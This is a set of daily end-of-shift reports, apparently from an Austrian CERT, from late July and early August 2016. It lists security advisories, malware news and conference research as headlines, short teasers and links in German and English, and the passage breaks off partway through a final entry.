=======================
= End-of-Shift report =
=======================
Timeframe: Freitag 05-08-2016 18:00 − Montag 08-08-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** F5 Security Advisory: glibc vulnerability CVE-2016-3706 ***
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/k/06/sol06493172.html?…
*** Smoke Loader - downloader with a smokescreen still alive ***
---------------------------------------------
This time we will have a look at another payload from recent RIG EK campaign. It is Smoke Loader (also known as Dofoil), a bot created several years ago. One of its early versions was advertised on the black marker in 2011.Categories: Malware Threat analysisTags: DofoildownloaderRIG EKsmoke loader(Read more...)
---------------------------------------------
https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-download…
*** Docker Unspecified Flaw Lets Remote Authenticated Users Deny Service on the Target Swarm Cluster ***
---------------------------------------------
http://www.securitytracker.com/id/1036548
*** Apple iOS Memory Corruption Error in IOMobileFrameBuffer Lets Applications Gain Elevated Privileges on the Target System ***
---------------------------------------------
http://www.securitytracker.com/id/1036546
*** FortiAnalyzer & FortiManager - Client Side Cross Site Scripting Web Vulnerability ***
---------------------------------------------
https://cxsecurity.com/issue/WLB-2016080052
*** This PC monitor hack can manipulate pixels for malicious effect ***
---------------------------------------------
Don't believe everything you see. It turns out even your computer monitor can be hacked.On Friday, researchers at DEF CON presented a way to manipulate the tiny pixels found on a computer display.Ang Cui and Jatin Kataria of Red Balloon Security were curious how Dell monitors worked and ended up reverse-engineering one.They picked apart a Dell U2410 monitor and found that the display controller inside can be used to change and log the pixels across the screen.During their DEF CON...
---------------------------------------------
http://www.cio.com/article/3104974/this-pc-monitor-hack-can-manipulate-pixe…
*** Angriff auf Geldautomaten mit Fernsteuerung ***
---------------------------------------------
Ein Sicherheitsforscher hat auf der Blackhat-Konferenz demonstriert, wie sich trotz PIN-Absicherung Bargeld von fremden Konten ziehen lässt. Angeblich lässt sich dabei auch an modernen Geldautomaten die PIN abgreifen, ohne Spuren zu hinterlassen.
---------------------------------------------
http://heise.de/-3289469
*** Externe Festplatten mit Verschlüsselung knackbar ***
---------------------------------------------
Viele USB-Festplatten mit Vollverschlüsselung und PIN-Tastatur lassen sich vermutlich entschlüsseln, wenn man die Firmware des USB-SATA-Bridge-Chips austauscht.
---------------------------------------------
http://heise.de/-3289530
*** Video surveillance recorders RIDDLED with 0-days ***
---------------------------------------------
Kit from NUUO, Netgear has face-palm grade stoopid There are multiple Web interface vulnerabilities in a network video recorder under Netgears ReadyNAS brand and various devices by video recording company NUUO.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2016/08/07/nuuo_netgea…
*** Strider: Cyberespionage group turns eye of Sauron on targets ***
---------------------------------------------
Low-profile group uses Remsec malware to spy on targets in Russia, China, and Europe. Twitter Card Style: summary_large_image A previously unknown group called Strider has been conducting cyberespionage-style attacks against selected targets in Russia, China, Sweden, and Belgium. The group uses an advanced piece of malware known as Remsec (Backdoor.Remsec) to conduct its attacks.read more
---------------------------------------------
http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-ey…
*** Week in review: Black Hat USA 2016 coverage, QRLJacking, exposed SAP systems ***
---------------------------------------------
Here's an overview of some of last week's most interesting news and articles: Black Hat USA 2016 Want to learn the news from Black Hat USA 2016? Get is all from our dedicated coverage page. QRLJacking: A new attack vector for hijacking online accounts We all know that scanning random QR codes is a risky proposition, but a newly detailed social engineering attack vector dubbed QRLJacking adds another risk layer to their use. 36000 SAP...
---------------------------------------------
https://www.helpnetsecurity.com/2016/08/08/week-review-black-hat-usa-2016-c…
*** Bugtraq: vBulletin <= 5.2.2 Preauth Server Side Request Forgery (SSRF) ***
---------------------------------------------
http://www.securityfocus.com/archive/1/539149
*** VMware product updates address multiple important security issues ***
---------------------------------------------
VMware product updates address a DLL hijacking issue in Windows-based VMware Tools and an HTTP Header injection issue in vCenter Server and ESXi.
Relevant Products: VMware vCenter Server VMware vSphere Hypervisor (ESXi) VMware Workstation Pro VMware Workstation Player VMware Fusion VMware Tools
---------------------------------------------
https://www.vmware.com/security/advisories/VMSA-2016-0010.html
*** Remote Butler attack: APT groups' dream come true ***
---------------------------------------------
Microsoft security researchers have come up with an extension of the "Evil Maid" attack that allows attackers to bypass local Windows authentication to defeat full disk encryption: "Remote Butler". Demonstrated at Black Hat USA 2016 by researchers Tal Be'ery and Chaim Hoch, the Remote Butler attack has one crucial improvement over Evil Maid: it can be effected by attackers who do not have physical access to the target Windows computer that has, at one time,...
---------------------------------------------
https://www.helpnetsecurity.com/2016/08/08/remote-butler-attack/
*** IBM Security Bulletin: Multiple vulnerabilities may affect IBM WebSphere Real Time ***
---------------------------------------------
Java SE issues disclosed in the Oracle July 2016 Critical Patch Update CVE(s): CVE-2016-3598, CVE-2016-3511, CVE-2016-3485 Affected product(s) and affected version(s): These vulnerabilities affect IBM WebSphere Real Time Version 3 Service Refresh 9 Fix Pack 40 and earlier releases Refer to the following reference URLs for remediation and additional vulnerability details:Source Bulletin: https://www-01.ibm.com/support/docview.wss?uid=swg21987762X-Force Database:...
---------------------------------------------
https://www-01.ibm.com/support/docview.wss?uid=swg21987762
*** IBM Security Bulletin: Multiple vulnerabilities may affect IBM SDK, Java Technology Edition ***
---------------------------------------------
Java SE issues disclosed in the Oracle July 2016 Critical Patch Update CVE(s): CVE-2016-3610, CVE-2016-3598, CVE-2016-3606, CVE-2016-3587, CVE-2016-3511, CVE-2016-3550, CVE-2016-3485 Affected product(s) and affected version(s): These vulnerabilities affect IBM SDK, Java Technology Edition, Version 6 Service Refresh 16 Fix Pack 26 and earlier releases These vulnerabilities affect IBM SDK, Java Technology Edition, Version 6R1 Service...
---------------------------------------------
https://www-01.ibm.com/support/docview.wss?uid=swg21986642
*** IBM Security Bulletin: OpenStack vulnerabilities affect IBM SmartCloud Entry(CVE-2015-7548, CVE-2015-8749 CVE-2015-1850) ***
---------------------------------------------
IBM SmartClound Entry is vulnerable to several Openstack Nova vulerabilities, which could allow a local authenticated attacker or a remote attacker to obtain sensitive information CVE(s): CVE-2015-8749, CVE-2015-7548, CVE-2015-1850 Affected product(s) and affected version(s): IBM SmartCloud Entry 3.2 through Appliance fix pack 21 IBM SmartCloud Entry 3.1 through Appliance fix pack 21 Refer to the...
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=isg3T1023865
*** VU#735416: UltraVNC repeater does not restrict IP addresses or ports by default ***
---------------------------------------------
Vulnerability Note VU#735416 UltraVNC repeater does not restrict IP addresses or ports by default Original Release date: 08 Aug 2016 | Last revised: 08 Aug 2016 Overview UltraVNC repeater versions prior to ultravnc_repeater_1300 do not restrict usage by IP address by default and cannot restrict by ports, which may be leveraged to induce connections to arbitrary hosts using any port. Description CWE-16: Configuration - CVE-2016-5673UltraVNC repeater acts as a proxy to route remote desktop VNC...
---------------------------------------------
http://www.kb.cert.org/vuls/id/735416
*** Neuer auftretender Verschlüsselungs-Trojaner (Ransomware) machen Daten unwiederbringlich unbrauchbar ***
---------------------------------------------
[...] Die derzeit auftretenden Varianten der Ransomware benennen sich Vegclass(a)aol.com, Salazar-Slytherin10(a)yahoo.com, usw., der eigentliche Schadcode dürfte dabei jedoch auf die aus Russland stammende Ransomware "Troldesh" zurück zu führen sein.
---------------------------------------------
http://www.bmi.gv.at/cms/bmi/_news/bmi.aspx?id=524B7A526E703148456D553D&pag…
*** Malware mit Barcodes und Excel in abgeschottete Netze einschleusen ***
---------------------------------------------
Ein Hacker bringt Malware auf einem Umweg in Netzwerke, bei denen weder USB noch optische Laufwerke oder Netzwerktransfers funktionieren. Er verwandelt die Software in 2D-Barcodes, die er dann mit Excel wieder in ausführbaren Code verwandelt.
---------------------------------------------
http://heise.de/-3290119
*** Qualcomm-powered Android devices plagued by four rooting flaws ***
---------------------------------------------
Hundreds of millions of Android devices based on Qualcomm chipsets are likely exposed to at least one of four critical vulnerabilities that allow non-privileged apps to take them over.The four flaws were presented by security researcher Adam Donenfeld from Check Point Software Technologies on Sunday at the DEF CON security conference in Las Vegas. They were reported to Qualcomm between February and April, and the chipset maker has since released fixes for the vulnerabilities after classifying...
---------------------------------------------
http://www.cio.com/article/3104896/qualcomm-powered-android-devices-plagued…
*** Data Breach At Oracle's MICROS Point-of-Sale Division ***
---------------------------------------------
A Russian organized cybercrime group known for hacking into banks and retailers appears to have breached more than 700 computer systems at software giant Oracle Corp., KrebsOnSecurity has learned. More alarmingly, the attackers appear to have compromised a customer support portal for companies using Oracles MICROS point-of-sale credit card payment systems.
---------------------------------------------
http://krebsonsecurity.com/?p=35752
=======================
= End-of-Shift report =
=======================
Timeframe: Donnerstag 04-08-2016 18:00 − Freitag 05-08-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** iPhone: Nach Diebstahl auf gezieltes Phishing achten ***
---------------------------------------------
Diebe setzen auf nachgestellte Apple-Anschreiben, um Beklaute zur Eingabe der Zugangsdaten zu bewegen. Damit können sie die Aktivierungssperre aufheben und das gestohlene iPhone voll funktionsfähig verkaufen.
---------------------------------------------
http://heise.de/-3288554
*** Microsoft Bounty Programs Expansion – Microsoft Edge Remote Code Execution (RCE) Bounty ***
---------------------------------------------
I’m very happy to announce another addition to the Microsoft Bounty Programs. Microsoft will be hosting a ..
---------------------------------------------
https://blogs.technet.microsoft.com/msrc/2016/08/04/microsoft-bounty-progra…
*** Pwnie Awards 2016: Die Oscars der Security-Szene gehen an … ***
---------------------------------------------
Die süßen goldenen Pwnies gingen unter anderem an Tavis Ormandy, Charlie Miller, Juniper und Western Digital. Nicht ..
---------------------------------------------
http://heise.de/-3288420
*** To Obfuscate, or not to Obfuscate ***
---------------------------------------------
Introduction Malwares goal is to bypass computer defenses, infect a target, and often remain on the system as long as possible. A variety of techniques are used to accomplish ..
---------------------------------------------
https://www.trustwave.com/Resources/SpiderLabs-Blog/To-Obfuscate,-or-not-to…
*** Apple will Hackern 200.000 Dollar für Bug-Entdeckung zahlen ***
---------------------------------------------
Während Microsoft, Google und Co schon länger Bug Bounty-Programme betreiben, hielt sich Apple bislang zurück
---------------------------------------------
http://derstandard.at/2000042391260
*** Cyber Grand Challenge: IT-Security könnte sich radikal ändern ***
---------------------------------------------
Wenn Computer völlig autonom Sicherheitslücken suchen, finden und dann entweder stopfen oder ausnutzen, bleibt ..
---------------------------------------------
http://heise.de/-3288820
*** WPAD: 20 Jahre altes Protokoll bringt Millionen Nutzer in Gefahr ***
---------------------------------------------
Das Protokoll WPAD dient zum automatischen Konfigurieren von Proxies und stellt eine lange bekannte ..
---------------------------------------------
http://heise.de/-3288801
*** Odd Packet: Any ideas where this comes from?, (Fri, Aug 5th) ***
---------------------------------------------
Out reader submitted to us severalodd packets. Of course, I cant resist to figure out what is exactly going on here: The packets appearto include a lengthy pre-ample, but I ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=21343
*** Frequent Password Changes is a Bad Security Idea ***
---------------------------------------------
Ive been saying for years that its bad security advice, that it encourages poor passwords. Lorrie Cranor, now the FTCs chief technologist, agrees:By studying the data, the researchers identified common techniques ..
---------------------------------------------
https://www.schneier.com/blog/archives/2016/08/frequent_passwo.html
*** Nach Bitcoin-Hack: Bitfinex-Diebe wollen jetzt spenden ***
---------------------------------------------
Nachdem Angreifer bei Bitfinex Bitcoin im Wert von rund 72 Millionen US-Dollar entwendet haben, wollen sie offenbar einen Teil davon spenden. Insgesamt 1.000 Bitcoin ..
---------------------------------------------
http://www.golem.de/news/nach-bitcoin-hack-bitfinex-diebe-wollen-jetzt-spen…
=======================
= End-of-Shift report =
=======================
Timeframe: Mittwoch 03-08-2016 18:00 − Donnerstag 04-08-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Cisco TelePresence Video Communication Server Expressway Command Injection Vulnerability ***
---------------------------------------------
A vulnerability in the administrative web interface of Cisco TelePresence Video Communication Server Expressway could allow an authenticated, remote attacker to execute arbitrary commands on the affected system.The ..
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco RV180 VPN and RV180W Wireless-N Multifunction VPN Routers Remote Code Execution Vulnerability ***
---------------------------------------------
A vulnerability in the web interface of the Cisco RV180 VPN Router and Cisco RV180W Wireless-N Multifunction VPN Router could allow an authenticated, remote ..
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco RV110W, RV130W, and RV215W Routers Command Shell Injection Vulnerability ***
---------------------------------------------
A vulnerability in the command-line interface (CLI) command parser of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an ..
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Administration Views - Critical - Access bypass - SA-CONTRIB-2016-041 ***
---------------------------------------------
https://www.drupal.org/node/2778501
*** Snitches get stitches: Little Snitch bugs were a blessing for malware ***
---------------------------------------------
Now-patched kernel-level flaw in OS X app firewall will be revealed this week DEF CON Vulnerabilities in popular OS X security tool Little Snitch potentially granted malicious applications extra powers, undermining the protection offered by the software.
---------------------------------------------
www.theregister.co.uk/2016/08/03/mac_firewall_littlesnitch/
*** A look into Neutrino EK’s jQueryGate ***
---------------------------------------------
In the cybercrime landscape, Exploit Kits (EKs) are the tools of choice to infect endpoints by exploiting software vulnerabilities. However, a critical component EKs ..
---------------------------------------------
https://blog.malwarebytes.com/threat-analysis/exploits-threat-analysis/2016…
*** [20160802] - Core - XSS Vulnerability ***
---------------------------------------------
https://developer.joomla.org/security-centre/653-20160802-core-xss-vulnerab…
*** [20160801] - Core - ACL Violation ***
---------------------------------------------
https://developer.joomla.org/security-centre/652-20160801-core-core-acl-vio…
*** [20160803] - Core - CSRF ***
---------------------------------------------
https://developer.joomla.org/security-centre/654-20160803-core-csrf.html
*** XML External Entity Injection Opens Door to Attacks, Theft ***
---------------------------------------------
XML is a popular language for web developers, partially due to its software and hardware independence. Recently, however, XML security is under threat from XML external ..
---------------------------------------------
https://blogs.mcafee.com/mcafee-labs/xml-external-entity-injection-opens-do…
*** A Plugin’s Expired Domain Poses a Security Threat to Websites ***
---------------------------------------------
Do you keep all your website software (including all third-party themes, plugins and components) up-to-date? You should! We always recommend this to our ..
---------------------------------------------
https://blog.sucuri.net/2016/08/plugin-expired-domain-security-threat.html
*** DSA-3639 wordpress - security update ***
---------------------------------------------
https://www.debian.org/security/2016/dsa-3639
*** Activity Log <= 2.3.2 - Cross-Site Scripting (XSS) ***
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8584
*** HEIST: Timing- und Kompressionsangriff auf TLS ***
---------------------------------------------
Durch die geschickte Kombination eines Timing-Angriffs in Javascript und der bereits bekannten BREACH-Attacke ist es möglich, Geheimnisse in TLS-Verbindungen zu entschlüsseln. Anders als früher ist dafür kein Man-in-the-Middle-Angriff nötig.
---------------------------------------------
http://www.golem.de/news/heist-timing-und-kompressionsangriff-auf-tls-1608-…
*** Activity Log <= 2.3.2 - Cross-Site Scripting (XSS) in page ***
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8585
*** Phishing-Studie: Neugier siegt über Sicherheitsbedenken ***
---------------------------------------------
Allen Warnungen und Sicherheitsvorkehrungen zum Trotz: Nutzer lassen sich sehr leicht auf eine Webseite locken, wenn die Phishing-Mail verführerisch genug klingt. Das sollte Auswirkungen auf die Sicherheitsarchitektur haben, fordern Forscher.
---------------------------------------------
http://www.golem.de/news/phishing-studie-neugier-siegt-ueber-sicherheitsbed…
*** Social Engineering: Jeder zweite fällt auf USB-Sticks und Facebook-Nachrichten rein ***
---------------------------------------------
Würden Sie einen gerade gefundenen USB-Stick anschließen? Würden Sie auf den Link in einer Facebook-Nachricht einer Ihnen unbekannten Person klicken? Laut zwei Studien beantworten dies viele mit nein – tun es aber trotzdem.
---------------------------------------------
http://heise.de/-3287818
*** DSA-3640 firefox-esr - security update ***
---------------------------------------------
https://www.debian.org/security/2016/dsa-3640
*** DSA-3638 curl - security update ***
----------------------------------------------
https://www.debian.org/security/2016/dsa-3638
=======================
= End-of-Shift report =
=======================
Timeframe: Dienstag 02-08-2016 18:00 − Mittwoch 03-08-2016 18:00
Handler: Alexander Riepl
Co-Handler: Stephan Richter
*** MICROSOFT LIVE ACCOUNT CREDENTIALS LEAKING FROM WINDOWS 8 AND ABOVE ***
---------------------------------------------
Discovered in 1997 by Aaron Spangler and never fixed, the WinNT/Win95 Automatic Authentication Vulnerability (IE Bug #4) is certainly an excellent vintage. In Windows 8 and 10, the same bug has now been found to potentially leak the user's Microsoft Live account login and (hashed) password information, which is also used to access OneDrive, Outlook, Office, Mobile, Bing, Xbox Live, MSN and Skype (if used with a Microsoft account).
---------------------------------------------
https://hackaday.com/2016/08/02/microsoft-live-account-credentials-leaking-…
*** Internet-Telefonie: Datenschützer raten zu Perfect Forward Secrecy ***
---------------------------------------------
Die Internationale Arbeitsgruppe zum Datenschutz in der Telekommunikation empfiehlt den Einsatz von sicherer Verschlüsselung bei Apps für VoIP oder Chats. Anbieter sollten möglichst wenig personenbezogene Informationen speichern.
---------------------------------------------
http://heise.de/-3285356
*** SAP ASE file creation vulnerability (CVE-2016-6196) ***
---------------------------------------------
Recently SAP released a patch for an Adaptive Server Enterprise vulnerability that allows legitimate database users to create files on disk where the server process can write to. This is useful when doing a chained database attack - first create...
---------------------------------------------
https://www.trustwave.com/Resources/SpiderLabs-Blog/SAP-ASE-file-creation-v…
*** The Dark Side of Certificate Transparency, (Wed, Aug 3rd) ***
---------------------------------------------
I am a big fan of the idea behind Certificate Transparency [1]. The real problem with SSL (and TLS... it really doesnt matter for this discussion) is not the weak ciphers or subtle issues with algorithms (yes, you should still fix it), but the certificate authority trust model. It has been too easy in the past to obtain a fraudulent certificate [2]. There was little accountability when it came to certificate authorities issuing test certificates, or just messing up, and validating the wrong...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=21329&rss
*** Windows 10 Anniversary Update fordert signierte Treiber schärfer ein ***
---------------------------------------------
Seit der 64-Bit-Version von Windows Vista verlangt Microsoft digital signierte Treiber für PC-Komponenten; die jüngste Windows-10-Version 1607 (Redstone) schraubt die Anforderungen höher.
---------------------------------------------
http://heise.de/-3285419
*** Unsichere SMS-Authentifizierung: Telegram-Accounts in Iran offenbar gehackt ***
---------------------------------------------
Der Messengerdienst Telegram gilt vielen als sichere Alternative zu Whatsapp. Doch es ist durchaus möglich, Sicherheitsvorkehrungen auszuhebeln und an Accounts zu gelangen.
---------------------------------------------
http://www.golem.de/news/unsichere-sms-authentifizierung-telegram-accounts-…
*** FossHub kompromittiert: Software-Installer mit Malware infiziert ***
---------------------------------------------
Die Download-Plattform FossHub ist gehackt worden. Die Hacker haben die Installer von verbreiteten Open-Source-Programmen mit Malware infiziert die den Bootloader überschreibt.
---------------------------------------------
http://heise.de/-3286347
*** A brief introduction to Forensic Readiness ***
---------------------------------------------
Introduction As defined in the RFC 2350 (Expectations for Computer Security Incident Response), the security incident is any adverse event which compromises some aspect of computer or network security. The definition of an incident may vary between organizations but generally is related to the compromise of confidentiality (i.e. document theft), integrity (i.e. alteration of the...
---------------------------------------------
http://resources.infosecinstitute.com/a-brief-introduction-to-forensic-read…
*** Finding and Enumerating Processes within Memory-Part 1 ***
---------------------------------------------
In this article series, we will learn about how processes reside in memory and various ways to find and enumerate them. I will be using Volatility plugins to find processes in memory. Once we know how to find processes within memory, in Part 2 we will see how to enumerate through them. Note: The scope...
---------------------------------------------
http://resources.infosecinstitute.com/finding-and-enumerating-processes-wit…
*** Social Engineering: Wie man anderen mit Schokolade das Passwort entlocken kann ***
---------------------------------------------
Wissenschafter belegen erschreckend leichtfertigen Umgang mit vertraulichen Daten
---------------------------------------------
http://derstandard.at/2000042272093-406
*** Four high-profile vulnerabilities in HTTP/2 revealed ***
---------------------------------------------
Imperva released a new report at Black Hat USA 2016, which documents four high-profile vulnerabilities researchers at the Imperva Defense Center found in HTTP/2, the new version of the HTTP protocol that serves as one of the main building blocks of the Worldwide Web. HTTP/2 introduces new mechanisms that effectively increase the attack surface of business critical web infrastructure which then becomes vulnerable to new types of attacks. Imperva researchers took an in-depth look at...
---------------------------------------------
https://www.helpnetsecurity.com/2016/08/03/vulnerable-http2/
*** Stealing payment card data and PINs from POS systems is dead easy ***
---------------------------------------------
Many of the large payment card breaches that hit retail and hospitality businesses in recent years were the result of attackers infecting point-of-sale systems with memory-scraping malware. But there are easier ways to steal this sort of data, due to a lack of authentication and encryption between card readers and the POS payment applications.POS systems are specialized computers. They typically run Windows and have peripherals like keyboards, touch screens, barcode scanners and card readers...
---------------------------------------------
http://www.cio.com/article/3102922/stealing-payment-card-data-and-pins-from…
*** Nagios Core Access Control Flaw Lets Remote Users Conduct Cross-Site Request Forgery Attacks ***
---------------------------------------------
http://www.securitytracker.com/id/1036513
*** Moxa SoftCMS SQL Injection Vulnerability ***
---------------------------------------------
This advisory contains mitigation details for a SQL injection vulnerability in Moxas SoftCMS.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-215-01
*** Siemens SINEMA Server Privilege Escalation Vulnerability ***
---------------------------------------------
This advisory contains mitigation details for a privilege escalation vulnerability in the Siemens SINEMA Server.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-215-02
=======================
= End-of-Shift report =
=======================
Timeframe: Montag 01-08-2016 18:00 − Dienstag 02-08-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Android Security Bulletin August 2016 ***
---------------------------------------------
https://source.android.com/security/bulletin/2016-08-01.html
*** Google Domain Enables HSTS Protection ***
---------------------------------------------
Google ensures HTTPS connections to its domains with support for HTTP Strict Transport Security, or HSTS.
---------------------------------------------
http://threatpost.com/google-domain-enables-hsts-protection/119597/
*** DSA-3637 chromium-browser - security update ***
---------------------------------------------
https://www.debian.org/security/2016/dsa-3637
*** Slinging Hash: Speeding Cyber Threat Hunting Methodologies via Hash-Based Searching ***
---------------------------------------------
Introduction The term "hash" is thrown around in casual IT conversation quite a bit nowadays, ..
---------------------------------------------
https://www.trustwave.com/Resources/SpiderLabs-Blog/Slinging-Hash--Speeding…
*** 36000 SAP systems exposed online, most open to attacks ***
---------------------------------------------
ERPScan released the first comprehensive SAP Cybersecurity Threat Report, which covers three main angles: Product Security, Implementation Security, and Security Awareness. The company used its own scanning method to gather ..
---------------------------------------------
https://www.helpnetsecurity.com/2016/08/02/sap-cybersecurity-report/
*** Im Darknet werden 200 Millionen Yahoo-Accounts verkauft ***
---------------------------------------------
Login-Informationen zu rund 200 Millionen Yahoo-Accounts werden zum Verkauf angeboten. Und Yahoo weiß darüber Bescheid.
---------------------------------------------
http://futurezone.at/digital-life/im-darknet-werden-200-millionen-yahoo-acc…
*** FireEye admits filtering out legitimate emails in sniffer snafu ***
---------------------------------------------
Benign messages frogmarched into quarantine FireEye has admitted that a snafu involving its email filtering technology meant harmless messages were shuffled off to quarantine for no good reason.
---------------------------------------------
www.theregister.co.uk/2016/08/02/fireeye_filtering_snafu/
*** Kasperskys Herz für Hacker: 50.000 US-Dollar für gemeldete Bugs ***
---------------------------------------------
Als zweiter AV-Hersteller führen die Russen ein Bug-Bounty-Programm ein. Sicherheitsforscher sollen nun Geld dafür bekommen, Schwachstellen in Kaspersky-Produkten zu finden.
---------------------------------------------
http://heise.de/-3284172
*** Introducing the p0f BPF compiler ***
---------------------------------------------
Two years ago we blogged about our love of BPF (BSD packet filter) bytecode.CC BY 2.0 image by jim simonsonThen we published a set of utilities we are using to generate the BPF ..
---------------------------------------------
https://blog.cloudflare.com/introducing-the-p0f-bpf-compiler/
*** Timing Attacks in the Modern Web ***
---------------------------------------------
Before you explore all the details of these browser-based timing attacks, head over to my laboratories to play around with these attacks yourself!
---------------------------------------------
https://tom.vg/2016/08/browser-based-timing-attacks/
=======================
= End-of-Shift report =
=======================
Timeframe: Freitag 29-07-2016 18:00 − Montag 01-08-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Fake FreeDNS Used to Redirect Traffic to Malicious Sites ***
---------------------------------------------
During the last couple of days we performed a few similar cleanup requests where sites occasionally redirected visitors to malicious sites that displayed ads, spam and malicious downloads. One of our security analysts, Andrey Kucherov, ..
---------------------------------------------
https://blog.sucuri.net/2016/07/fake-freedns-used-to-redirect-traffic-to-ma…
*** SwiftKey zeigt Vorschläge fremder Nutzer ***
---------------------------------------------
Nutzer des alternativen Smartphone-Keyboards SwiftKey haben Wortvorschläge fremder Nutzer erhalten. Neben Wörtern in anderen Sprachen sollen auch fremde E-Mail-Adressen darunter gewesen sein.
---------------------------------------------
http://heise.de/-3282177
*** DSA-3636 collectd - security update ***
---------------------------------------------
Emilien Gaspar discovered that collectd, a statistics collection andmonitoring daemon, incorrectly processed incoming networkpackets. This resulted in a heap overflow, allowing a remote attackerto either cause a DoS via application crash, or potentially executearbitrary code.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3636
*** HTML-Injection-Lücke erlaubte Zertifikatsklau bei Comodo ***
---------------------------------------------
Eine Lücke im Zertifikats-Bestellsystem der Certification Authority Comodo erlaubte es Angreifern, sich SSL-Zertifikate für fremde Websites ausstellen zu lassen, was Man-in-the-middle-Lauschangriffe auf deren Traffic ermöglicht.
---------------------------------------------
http://heise.de/-3282183
*** Xen Vulnerability Allows Hackers To Escape Qubes OS VM And Own the Host ***
---------------------------------------------
Slashdot reader Noryungi writes: Qubes OS certainly has an intriguing approach to security, but a newly discovered Xen vulnerability allows a hacker to escape a VM and own the host. If you are running Qubes, make sure you update ..
---------------------------------------------
https://tech.slashdot.org/story/16/07/30/1552244/xen-vulnerability-allows-h…
*** DSA-3634 redis - security update ***
---------------------------------------------
It was discovered that redis, a persistent key-value database, did notproperly protect redis-cli history files: they were created by defaultwith world-readable permissions.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3634
*** Are you getting I-CANNED? ***
---------------------------------------------
One year ago, I already covered the impact that ICANNs latest money grab was having on security, see https://isc.sans.edu/forums/diary/httpsyourfakebanksupport+TLD+confusion+st…. ICANN is the organization that ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=21323
*** Booking Calendar <= 6.2 - SQL Injection ***
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8576
*** Booking Calendar <= 6.2 - Reflected Cross-Site Scripting (XSS) ***
---------------------------------------------
https://wpvulndb.com/vulnerabilities/8575
*** Pokémon GO Creators Twitter Account Hacked — Pika, Pikaaaa! ***
---------------------------------------------
Twitter account of another high-profile CEO has been hacked! This time, its Niantic CEO John Hanke, the developer behind the worlds most popular game Pokémon GO. And it ..
---------------------------------------------
https://thehackernews.com/2016/07/pokemon-go-hack.html
*** Kaspersky DDoS Intelligence Report for Q2 2016 ***
---------------------------------------------
In Q2 2016, the geography of DDoS attacks narrowed to 70 countries, with China accounting for 77.4% of attacks. In fact, 97.3% of the targeted resources were located in ..
---------------------------------------------
http://securelist.com/analysis/quarterly-malware-reports/75513/kaspersky-dd…
*** INTERPOL Arrests Business Email Compromise Scam Mastermind ***
---------------------------------------------
Business Email Compromise (BEC) attacks have proven to be an effective tactic, with criminals stealing large amounts of money from various businesses. From 2013 to 2015, BEC-related damages were estimated at US$ 2.3 billion. Targeting ..
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/interpol-arrests…
*** Sicherheitslücke: Millionen Daten von Flugreisenden jahrelang im Internet ***
---------------------------------------------
Rechnungen, Namen und teilweise sogar die Bankdaten von Flugreisenden waren jahrelang ohne technische Hürden offen im Netz verfügbar - ohne, dass es jemandem aufgefallen wäre. Auch Kriminelle haben die Daten nach aktuellem Stand übersehen.
---------------------------------------------
http://www.golem.de/news/sicherheitsluecke-millionen-daten-von-flugreisende…
=======================
= End-of-Shift report =
=======================
Timeframe: Donnerstag 28-07-2016 18:00 − Freitag 29-07-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Long-running malvertising campaign infected thousands of computers per day ***
---------------------------------------------
Security researchers have shut down a large-scale malvertising operation that used sophisticated techniques to remain undetected for months and served exploits to millions of computers.The operation, dubbed AdGholas, has been running since at least October 2015. According to security vendor Proofpoint, the gang behind it managed to distribute malicious advertisements through more than 100 ad exchanges, attracting between 1 million and 5 million page hits per day.The Proofpoint researchers...
---------------------------------------------
http://www.cio.com/article/3101817/long-running-malvertising-campaign-infec…
*** Would You Use This ATM? ***
---------------------------------------------
One basic tenet of computer security is this: If you cant vouch for a networked things physical security, you also cannot vouch for its cybersecurity. Thats because in most cases, networked things really arent designed to foil a skilled and determined attacker who can freely connect his own devices. So you can imagine my shock and horror seeing a Cisco switch and wireless antenna sitting exposed atop of an ATM out in front of a bustling grocery store in my hometown of Northern Virginia.
---------------------------------------------
http://krebsonsecurity.com/2016/07/would-you-use-this-atm/
*** Q2 DDoS activity up 83%, report ***
---------------------------------------------
Nexusguard researchers noticed an 83 percent uptick in DDoS attacks in Q2 2016 compared to Q1.
---------------------------------------------
http://www.scmagazine.com/q2-ddos-threat-report-notes-83-percent-uptick/art…
*** Pwnie Express open sources IoT and Bluetooth security tools ***
---------------------------------------------
Pwnie Express announced the availability of open sourced versions of its Blue Hydra and Android build system software. The release of these tools enable comprehensive Bluetooth detection and community based development of penetration testing Android devices. Bluetooth detection is critical for effective device threat detection and must cover both Low energy (LE) and Classic Bluetooth standards. Blue Hydra has also been integrated into Pwnie's monitoring platform, Pulse, to provide...
---------------------------------------------
https://www.helpnetsecurity.com/2016/07/29/pwnie-express-iot-bluetooth-secu…
*** Businesses need to protect data, not just devices ***
---------------------------------------------
